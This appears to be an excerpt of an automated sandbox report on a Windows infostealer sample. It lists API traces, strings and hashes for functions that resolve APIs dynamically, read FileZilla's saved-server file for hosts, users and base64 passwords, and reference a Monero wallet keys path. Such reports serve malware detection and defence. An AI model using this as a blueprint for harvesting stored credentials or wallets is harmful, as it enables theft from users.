Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 7462f5c4f87beed91f375902b1004fa00d7c2402520bd1415bea1c2d1ca4a4f5
Instruction ID: 1c5cb3ea6c86d74d9467f60da6fcfea792429d8d8f179bff97fa0d285302b41b
Opcode Fuzzy Hash: 7462f5c4f87beed91f375902b1004fa00d7c2402520bd1415bea1c2d1ca4a4f5
Instruction Fuzzy Hash: 98D09E74A4430CDBCB04DFE0D9496DDBB78FB1C716F101659D905A2340EA316596CBA6

Function 00829C10 Relevance: 229.9, APIs: 112, Strings: 19, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,00EE6280), ref: 00829C2D
GetProcAddress.KERNEL32(75900000,00EE6380), ref: 00829C45
GetProcAddress.KERNEL32(75900000,00EF8FA0), ref: 00829C5E
GetProcAddress.KERNEL32(75900000,00EF8F10), ref: 00829C76
GetProcAddress.KERNEL32(75900000,00EFCAC0), ref: 00829C8E
GetProcAddress.KERNEL32(75900000,00EFC9D0), ref: 00829CA7
GetProcAddress.KERNEL32(75900000,00EEB248), ref: 00829CBF
GetProcAddress.KERNEL32(75900000,00EFCA90), ref: 00829CD7
GetProcAddress.KERNEL32(75900000,00EFC8E0), ref: 00829CF0
GetProcAddress.KERNEL32(75900000,00EFCA18), ref: 00829D08
GetProcAddress.KERNEL32(75900000,00EFC838), ref: 00829D20
GetProcAddress.KERNEL32(75900000,00EE65E0), ref: 00829D39
GetProcAddress.KERNEL32(75900000,00EE6440), ref: 00829D51
GetProcAddress.KERNEL32(75900000,00EE6600), ref: 00829D69
GetProcAddress.KERNEL32(75900000,00EE62A0), ref: 00829D82
GetProcAddress.KERNEL32(75900000,00EFC940), ref: 00829D9A
GetProcAddress.KERNEL32(75900000,00EFCA00), ref: 00829DB2
GetProcAddress.KERNEL32(75900000,00EEB018), ref: 00829DCB
GetProcAddress.KERNEL32(75900000,00EE6620), ref: 00829DE3
GetProcAddress.KERNEL32(75900000,00EFC820), ref: 00829DFB
GetProcAddress.KERNEL32(75900000,00EFCAA8), ref: 00829E14
GetProcAddress.KERNEL32(75900000,00EFC850), ref: 00829E2C
GetProcAddress.KERNEL32(75900000,00EFCA60), ref: 00829E44
GetProcAddress.KERNEL32(75900000,00EE6500), ref: 00829E5D
GetProcAddress.KERNEL32(75900000,00EFC808), ref: 00829E75
GetProcAddress.KERNEL32(75900000,00EFCAD8), ref: 00829E8D
GetProcAddress.KERNEL32(75900000,00EFC868), ref: 00829EA6
GetProcAddress.KERNEL32(75900000,00EFC880), ref: 00829EBE
GetProcAddress.KERNEL32(75900000,00EFC898), ref: 00829ED6
GetProcAddress.KERNEL32(75900000,00EFC8B0), ref: 00829EEF
GetProcAddress.KERNEL32(75900000,00EFC8C8), ref: 00829F07
GetProcAddress.KERNEL32(75900000,00EFCA48), ref: 00829F1F
GetProcAddress.KERNEL32(75900000,00EFC928), ref: 00829F38
GetProcAddress.KERNEL32(75900000,00EF9948), ref: 00829F50
GetProcAddress.KERNEL32(75900000,00EFC958), ref: 00829F68
GetProcAddress.KERNEL32(75900000,00EFC7F0), ref: 00829F81
GetProcAddress.KERNEL32(75900000,00EE6320), ref: 00829F99
GetProcAddress.KERNEL32(75900000,00EFC8F8), ref: 00829FB1
GetProcAddress.KERNEL32(75900000,00EE6480), ref: 00829FCA
GetProcAddress.KERNEL32(75900000,00EFC910), ref: 00829FE2
GetProcAddress.KERNEL32(75900000,00EFC9E8), ref: 00829FFA
GetProcAddress.KERNEL32(75900000,00EE6660), ref: 0082A013
GetProcAddress.KERNEL32(75900000,00EE62E0), ref: 0082A02B
LoadLibraryA.KERNEL32(00EFC988,?,00825CA3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE3), ref: 0082A03D
LoadLibraryA.KERNEL32(00EFC970,?,00825CA3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE3), ref: 0082A04E
LoadLibraryA.KERNEL32(00EFC9A0,?,00825CA3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE3), ref: 0082A060
LoadLibraryA.KERNEL32(00EFC9B8,?,00825CA3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE3), ref: 0082A072
LoadLibraryA.KERNEL32(00EFCA30,?,00825CA3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE3), ref: 0082A083
LoadLibraryA.KERNEL32(00EFCA78,?,00825CA3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE3), ref: 0082A095
LoadLibraryA.KERNEL32(00EFCD00,?,00825CA3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE3), ref: 0082A0A7
LoadLibraryA.KERNEL32(00EFCBC8,?,00825CA3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE3), ref: 0082A0B8
GetProcAddress.KERNEL32(75FD0000,00EE66E0), ref: 0082A0DA
GetProcAddress.KERNEL32(75FD0000,00EFCD18), ref: 0082A0F2
GetProcAddress.KERNEL32(75FD0000,00EF8930), ref: 0082A10A
GetProcAddress.KERNEL32(75FD0000,00EFCDA8), ref: 0082A123
GetProcAddress.KERNEL32(75FD0000,00EE6840), ref: 0082A13B
GetProcAddress.KERNEL32(73480000,00EEB1D0), ref: 0082A160
GetProcAddress.KERNEL32(73480000,00EE6740), ref: 0082A179
GetProcAddress.KERNEL32(73480000,00EEAF28), ref: 0082A191
GetProcAddress.KERNEL32(73480000,00EFCBE0), ref: 0082A1A9
GetProcAddress.KERNEL32(73480000,00EFCCA0), ref: 0082A1C2
GetProcAddress.KERNEL32(73480000,00EE6800), ref: 0082A1DA
GetProcAddress.KERNEL32(73480000,00EE6980), ref: 0082A1F2
GetProcAddress.KERNEL32(73480000,00EFCD60), ref: 0082A20B
GetProcAddress.KERNEL32(763B0000,00EE6960), ref: 0082A22C
GetProcAddress.KERNEL32(763B0000,00EE69A0), ref: 0082A244
GetProcAddress.KERNEL32(763B0000,00EFCBB0), ref: 0082A25D
GetProcAddress.KERNEL32(763B0000,00EFCC58), ref: 0082A275
GetProcAddress.KERNEL32(763B0000,00EE67A0), ref: 0082A28D
GetProcAddress.KERNEL32(750F0000,00EEB270), ref: 0082A2B3
GetProcAddress.KERNEL32(750F0000,00EEB2C0), ref: 0082A2CB
GetProcAddress.KERNEL32(750F0000,00EFCD48), ref: 0082A2E3
GetProcAddress.KERNEL32(750F0000,00EE6780), ref: 0082A2FC
GetProcAddress.KERNEL32(750F0000,00EE6760), ref: 0082A314
GetProcAddress.KERNEL32(750F0000,00EEB1F8), ref: 0082A32C
GetProcAddress.KERNEL32(75A50000,00EFCBF8), ref: 0082A352
GetProcAddress.KERNEL32(75A50000,00EE66A0), ref: 0082A36A
GetProcAddress.KERNEL32(75A50000,00EF8880), ref: 0082A382
GetProcAddress.KERNEL32(75A50000,00EFCD78), ref: 0082A39B
GetProcAddress.KERNEL32(75A50000,00EFCC70), ref: 0082A3B3
GetProcAddress.KERNEL32(75A50000,00EE6900), ref: 0082A3CB
GetProcAddress.KERNEL32(75A50000,00EE66C0), ref: 0082A3E4
GetProcAddress.KERNEL32(75A50000,00EFCD90), ref: 0082A3FC
GetProcAddress.KERNEL32(75A50000,00EFCC88), ref: 0082A414
GetProcAddress.KERNEL32(75070000,00EE6860), ref: 0082A436
GetProcAddress.KERNEL32(75070000,00EFCCB8), ref: 0082A44E
GetProcAddress.KERNEL32(75070000,00EFCCD0), ref: 0082A466
GetProcAddress.KERNEL32(75070000,00EFCB68), ref: 0082A47F
GetProcAddress.KERNEL32(75070000,00EFCCE8), ref: 0082A497
GetProcAddress.KERNEL32(74E50000,00EE69C0), ref: 0082A4B8
GetProcAddress.KERNEL32(74E50000,00EE68A0), ref: 0082A4D1
GetProcAddress.KERNEL32(75320000,00EE6700), ref: 0082A4F2
GetProcAddress.KERNEL32(75320000,00EFCDC0), ref: 0082A50A
GetProcAddress.KERNEL32(6F060000,00EE6A00), ref: 0082A530
GetProcAddress.KERNEL32(6F060000,00EE6820), ref: 0082A548
GetProcAddress.KERNEL32(6F060000,00EE68C0), ref: 0082A560
GetProcAddress.KERNEL32(6F060000,00EFCC40), ref: 0082A579
GetProcAddress.KERNEL32(6F060000,00EE67C0), ref: 0082A591
GetProcAddress.KERNEL32(6F060000,00EE6880), ref: 0082A5A9
GetProcAddress.KERNEL32(6F060000,00EE68E0), ref: 0082A5C2
GetProcAddress.KERNEL32(6F060000,00EE67E0), ref: 0082A5DA
GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0082A5F1
GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0082A607
GetProcAddress.KERNEL32(74E00000,00EFCD30), ref: 0082A629
GetProcAddress.KERNEL32(74E00000,00EF89E0), ref: 0082A641
GetProcAddress.KERNEL32(74E00000,00EFCB98), ref: 0082A659
GetProcAddress.KERNEL32(74E00000,00EFCDD8), ref: 0082A672
GetProcAddress.KERNEL32(74DF0000,00EE6920), ref: 0082A693
GetProcAddress.KERNEL32(6F9C0000,00EFCAF0), ref: 0082A6B4
GetProcAddress.KERNEL32(6F9C0000,00EE6940), ref: 0082A6CD
GetProcAddress.KERNEL32(6F9C0000,00EFCC10), ref: 0082A6E5
GetProcAddress.KERNEL32(6F9C0000,00EFCB08), ref: 0082A6FD

Strings

`i, xrefs: 0082A21F
e, xrefs: 00829D2B
f, xrefs: 0082A0CC
g, xrefs: 0082A5CD
c, xrefs: 00829F8C
b, xrefs: 0082A01E
h, xrefs: 0082A53B
h, xrefs: 0082A5B4
i, xrefs: 0082A686
f, xrefs: 00829DD6
@d, xrefs: 00829D44
@h, xrefs: 0082A12E
`h, xrefs: 0082A428
@g, xrefs: 0082A16B
InternetSetOptionA, xrefs: 0082A5E5
HttpQueryInfoA, xrefs: 0082A5FC
`g, xrefs: 0082A307
`f, xrefs: 0082A005
@i, xrefs: 0082A6BF

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: c$ f$ h$ i$@d$@g$@h$@i$HttpQueryInfoA$InternetSetOptionA$`f$`g$`h$`i$b$e$f$g$h
API String ID: 2238633743-3146661619
Opcode ID: fb71dcd3af9232ce265c4f61c3e030b1af55facfa1a8f7e0f09875016217baf0
Instruction ID: 57af0280b595f154dcf9ccae6aa5e5d4475b271861b37c1b742290e816adeccb
Opcode Fuzzy Hash: fb71dcd3af9232ce265c4f61c3e030b1af55facfa1a8f7e0f09875016217baf0
Instruction Fuzzy Hash: 7762E9B6710700AFC744DFE8ED989663BF9F7AC703714871AA609C3264D6399843DB52

Function 00817710 Relevance: 100.3, APIs: 54, Strings: 3, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00817724
RtlAllocateHeap.NTDLL(00000000), ref: 0081772B
lstrcat.KERNEL32(?,00EF94C8), ref: 008178DB
lstrcat.KERNEL32(?,?), ref: 008178EF
lstrcat.KERNEL32(?,?), ref: 00817903
lstrcat.KERNEL32(?,?), ref: 00817917
lstrcat.KERNEL32(?,00EFD818), ref: 0081792B
lstrcat.KERNEL32(?,00EFD9B0), ref: 0081793F
lstrcat.KERNEL32(?,00EFDA40), ref: 00817952
lstrcat.KERNEL32(?,00EFD9C8), ref: 00817966
lstrcat.KERNEL32(?,00EFDFD8), ref: 0081797A
lstrcat.KERNEL32(?,?), ref: 0081798E
lstrcat.KERNEL32(?,?), ref: 008179A2
lstrcat.KERNEL32(?,?), ref: 008179B6
lstrcat.KERNEL32(?,00EFD818), ref: 008179C9
lstrcat.KERNEL32(?,00EFD9B0), ref: 008179DD
lstrcat.KERNEL32(?,00EFDA40), ref: 008179F1
lstrcat.KERNEL32(?,00EFD9C8), ref: 00817A04
lstrcat.KERNEL32(?,00EFE040), ref: 00817A18
lstrcat.KERNEL32(?,?), ref: 00817A2C
lstrcat.KERNEL32(?,?), ref: 00817A40
lstrcat.KERNEL32(?,?), ref: 00817A54
lstrcat.KERNEL32(?,00EFD818), ref: 00817A68
lstrcat.KERNEL32(?,00EFD9B0), ref: 00817A7B
lstrcat.KERNEL32(?,00EFDA40), ref: 00817A8F
lstrcat.KERNEL32(?,00EFD9C8), ref: 00817AA3
lstrcat.KERNEL32(?,00EFE0A8), ref: 00817AB6
lstrcat.KERNEL32(?,?), ref: 00817ACA
lstrcat.KERNEL32(?,?), ref: 00817ADE
lstrcat.KERNEL32(?,?), ref: 00817AF2
lstrcat.KERNEL32(?,00EFD818), ref: 00817B06
lstrcat.KERNEL32(?,00EFD9B0), ref: 00817B1A
lstrcat.KERNEL32(?,00EFDA40), ref: 00817B2D
lstrcat.KERNEL32(?,00EFD9C8), ref: 00817B41
lstrcat.KERNEL32(?,00EFE110), ref: 00817B55
lstrcat.KERNEL32(?,?), ref: 00817B69
lstrcat.KERNEL32(?,?), ref: 00817B7D
lstrcat.KERNEL32(?,?), ref: 00817B91
lstrcat.KERNEL32(?,00EFD818), ref: 00817BA4
lstrcat.KERNEL32(?,00EFD9B0), ref: 00817BB8
lstrcat.KERNEL32(?,00EFDA40), ref: 00817BCC
lstrcat.KERNEL32(?,00EFD9C8), ref: 00817BDF
lstrcat.KERNEL32(?,00EFE178), ref: 00817BF3
lstrcat.KERNEL32(?,?), ref: 00817C07
lstrcat.KERNEL32(?,?), ref: 00817C1B
lstrcat.KERNEL32(?,?), ref: 00817C2F
lstrcat.KERNEL32(?,00EFD818), ref: 00817C43
lstrcat.KERNEL32(?,00EFD9B0), ref: 00817C56
lstrcat.KERNEL32(?,00EFDA40), ref: 00817C6A
lstrcat.KERNEL32(?,00EFD9C8), ref: 00817C7E

Part of subcall function 008175D0: lstrcat.KERNEL32(359B0020,008317FC), ref: 00817606
Part of subcall function 008175D0: lstrcat.KERNEL32(359B0020,00000000), ref: 00817648
Part of subcall function 008175D0: lstrcat.KERNEL32(359B0020, : ), ref: 0081765A
Part of subcall function 008175D0: lstrcat.KERNEL32(359B0020,00000000), ref: 0081768F
Part of subcall function 008175D0: lstrcat.KERNEL32(359B0020,00831804), ref: 008176A0
Part of subcall function 008175D0: lstrcat.KERNEL32(359B0020,00000000), ref: 008176D3
Part of subcall function 008175D0: lstrcat.KERNEL32(359B0020,00831808), ref: 008176ED
Part of subcall function 008175D0: task.LIBCPMTD ref: 008176FB

lstrcat.KERNEL32(?,00EFE260), ref: 00817E0B
lstrcat.KERNEL32(?,00EFD2D8), ref: 00817E1E
lstrlen.KERNEL32(359B0020), ref: 00817E2B
lstrlen.KERNEL32(359B0020), ref: 00817E3B

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Strings

`, xrefs: 00817DFD
x, xrefs: 00817BE5
@, xrefs: 00817A0A

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID: @$`$x
API String ID: 928082926-2814969637
Opcode ID: 026ba5d1999d23ee01b601642f370f889e01df09f328b30e028b420367505f10
Instruction ID: 1ed8cc8a144f04e9f50b85b2fc2b636897640ad4f4fd1c2843a2daf9b7eccab5
Opcode Fuzzy Hash: 026ba5d1999d23ee01b601642f370f889e01df09f328b30e028b420367505f10
Instruction Fuzzy Hash: C5321FB6D00314ABCB15EBA0DC85DEE777CBB54701F444A98F219A2090EE75E7CA8F52

Function 00820250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 00828DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828E0B

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

Part of subcall function 008199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008199EC
Part of subcall function 008199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00819A11
Part of subcall function 008199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00819A31
Part of subcall function 008199C0: ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 00819A5A
Part of subcall function 008199C0: LocalFree.KERNEL32(0081148F), ref: 00819A90
Part of subcall function 008199C0: CloseHandle.KERNEL32(000000FF), ref: 00819A9A

Part of subcall function 00828E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828E52

GetProcessHeap.KERNEL32(00000000,000F423F,00830DBA,00830DB7,00830DB6,00830DB3), ref: 00820362
RtlAllocateHeap.NTDLL(00000000), ref: 00820369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00820385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB2), ref: 00820393
StrStrA.SHLWAPI(00000000,<Port>), ref: 008203CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB2), ref: 008203DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00820419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB2), ref: 00820427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00820463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB2), ref: 00820475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB2), ref: 00820502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB2), ref: 0082051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB2), ref: 00820532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB2), ref: 0082054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00820562
lstrcat.KERNEL32(?,profile: null), ref: 00820571
lstrcat.KERNEL32(?,url: ), ref: 00820580
lstrcat.KERNEL32(?,00000000), ref: 00820593
lstrcat.KERNEL32(?,00831678), ref: 008205A2
lstrcat.KERNEL32(?,00000000), ref: 008205B5
lstrcat.KERNEL32(?,0083167C), ref: 008205C4
lstrcat.KERNEL32(?,login: ), ref: 008205D3
lstrcat.KERNEL32(?,00000000), ref: 008205E6
lstrcat.KERNEL32(?,00831688), ref: 008205F5
lstrcat.KERNEL32(?,password: ), ref: 00820604
lstrcat.KERNEL32(?,00000000), ref: 00820617
lstrcat.KERNEL32(?,00831698), ref: 00820626
lstrcat.KERNEL32(?,0083169C), ref: 00820635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB2), ref: 0082068E

Strings

<Pass encoding="base64">, xrefs: 0082045A
browser: FileZilla, xrefs: 00820559
password: , xrefs: 008205FB
<Host>, xrefs: 0082037C
login: , xrefs: 008205CA
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 008202A4
profile: null, xrefs: 00820568
<User>, xrefs: 00820410
url: , xrefs: 00820577
<Port>, xrefs: 008203C6

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 599c2f518002d9516d72685b4ffa5fc28c593c5a5b6a2d4912463ea7c975546f
Instruction ID: 12bad6e8f1d5508f2c26b0dc0f893c52f02c6bc4ecfaaae40b650187be760266
Opcode Fuzzy Hash: 599c2f518002d9516d72685b4ffa5fc28c593c5a5b6a2d4912463ea7c975546f
